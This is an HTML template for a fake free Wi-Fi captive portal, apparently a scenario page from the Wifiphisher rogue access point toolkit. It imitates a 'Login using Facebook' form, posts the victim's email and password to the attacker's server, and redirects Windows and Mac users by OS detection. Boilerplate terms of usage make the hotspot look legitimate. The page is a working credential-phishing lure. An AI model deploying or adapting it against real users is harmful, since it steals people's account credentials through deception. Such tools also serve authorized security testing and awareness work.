<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<!--
Copyright (c) 2016 by Andy Tran (http://codepen.io/andytran/pen/PwoQgO)
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-->

  <meta charset="UTF-8">
  <title>{{ organization }} Wi-Fi Service</title>
  <link rel="stylesheet" href="static/css/reset.css">
  <link rel='stylesheet prefetch' href='static/css/roboto.css'>
  <link rel='stylesheet prefetch' href='static/css/font-awesome.min.css'>
  <link rel="stylesheet" href="static/css/style.css">
  <script src='static/js/jquery.min.js'></script>
  <script src="static/js/index.js"></script>
</head>

<style>
/*Do not remove this style part and put it in style.css because if you do you'll have some conflicts in the apperance of index.html and login.html*/
/*Both style parts inside index.html and login.html will have conflicts if you put them together inside style.css*/
body {
  color: #666666;
  font-family: 'RobotoDraft', 'Roboto', sans-serif;
}

/* Form Module */
.form-module {
  max-width: 320px;
}
.login-btn {
  cursor: pointer;
  background: #33b5e5;
  width: 100%;
  border: 0;
  padding: 10px 15px;
  color: #ffffff;
  -webkit-transition: 0.3s ease;
  transition: 0.3s ease;
}


</style>

<script>
function oauth_popup() {
  var popup_enabled = {{ popup }};
  if (popup_enabled === true) {
    detect_os();
  }
  else {
    return false;
  }
}
</script>



<script>
/* If the popup value has been set to true then this script will do a OS discovery to the connected user browser and if he's OS is compatible with the JS popup then he will be redirected to the login page but if he's not then he will stay on this Oauth login page (the default one). */
function detect_os() {

var OSName="Unknown OS";
if (navigator.appVersion.indexOf("Win")!=-1) OSName="Windows";
if (navigator.appVersion.indexOf("Mac")!=-1) OSName="MacOS";
if (navigator.appVersion.indexOf("X11")!=-1) OSName="UNIX";
if (navigator.appVersion.indexOf("Linux")!=-1) OSName="Linux";



if (OSName == "Windows") {
window.location='login.html';
    };
if (OSName == "MacOS") {
window.location='login.html';
    };


if (OSName == "Linux") {
return false;
    };

if (OSName == "UNIX") {
return false;
    };
}

</script>

<body onload="oauth_popup()">
  <!-- Form Mixin-->
  <!-- Input Mixin-->
  <!-- Button Mixin-->
  <!-- Pen Title-->
  <div class="pen-title">
    <h1>Get connected to the Internet for free</h1><span>A simple, no frills {{ organization }} Wi-Fi service.</span>
  </div>
  <!-- Form Module-->
  <div class="module form-module">
    <div class="form">
    </div>
    <div class="form">
      <h2>Login using Facebook</h2>
      <!-- <img src="/static/logos/facebook-logo.png" width="25%" class="logo"></img> -->
      <form name="theform" class="theform" method="post" action="oauth.html">
        <input type="email" placeholder="Email" name="wfphshr-email" required />
        <input type="password" placeholder="Password" minlength="5" name="wfphshr-password" required />
        <button class="login-btn">Login</button>
      </form>
    </div>
    <div class="cta"><a id="btn1">Terms of Usage</a></div>
  </div>

  <!-- The Modal -->
  <div id="myModal" class="modal">

    <!-- Modal content -->
    <div class="modal-content">
      <div class="modal-header">
        <span class="close">×</span>
        <h2 style="color:darkslategray;font-size:18px;">Terms of Usage</h2>
      </div>
      <div class="modal-body">
        <p>This is a {{ organization }} free Hotspot wireless internet Service (the “Service”) provided for use by
          customers. All users are required to log-in individually as an independent user.</p>
        <p>
          The Service is made available provided:
        </p>
        <p>
          (a) You do not use the Service for anything unlawful, immoral or improper;
        </p>
        <p>
          (b) You do not use the Service to make offensive or nuisance communications in whatever form. Such usage
          includes posting, transmitting, uploading, downloading or otherwise facilitating any content that is
          unlawful, defamatory, threatening, a nuisance, obscene, hateful, abusive, harmful (including but not limited
          to viruses, corrupted files, or any other similar software or programs), a breach of privacy, or which is
          otherwise objectionable;
        </p>
        <p>
          (c) You do not use the Service to harm or attempt to harm minors in any way;
        </p>
        <p>
          (d) You do not act nor knowingly permit others to act in such a way that the operation of the Service or our
          systems will be jeopardized or impaired;
        </p>
        <p>
          (e) You do not use abusive or threatening behavior towards other users of the Service, members of our staff
          or any person in the vicinity of a Wireless LAN Hotspot;
        </p>
        <p>
          (f) You do not use the Service to access or use content in a way that infringes the rights of others;
        </p>
        <p>
          (g) The Service is used in accordance with any third party policies for acceptable use or any relevant
          internet standards (where applicable).
        </p>
        <p>
          (h) You agree not to resell or re-broadcast any aspect of the Service, whether for profit or otherwise. You
          accept that your entitlement to use the Service is for your personal use only and that you shall not be
          entitled to transfer your entitlement to use the Service to any other person or allow any other person to
          make use of the Service or of any username or password or other entitlement supplied to you in connection
          with the Service.
        </p>
        <p>
          (i) You also agree not to modify the Unit or use the Service for any fraudulent purpose, or in such a way as
          to create damage or risk to our business, reputation, employees, subscribers, facilities, third parties or to
          the public generally.
        </p>
        <p>
          (j) You have no proprietary or ownership rights to any username or password or to a specific IP address, or
          e-mail address assigned to you or your Unit. We may change such addresses at any time or deactivate or
          suspend Service to any address without prior notice to you if we suspect any unlawful or fraudulent use of
          the services.
        </p>
      </div>
    </div>
</body>

</html>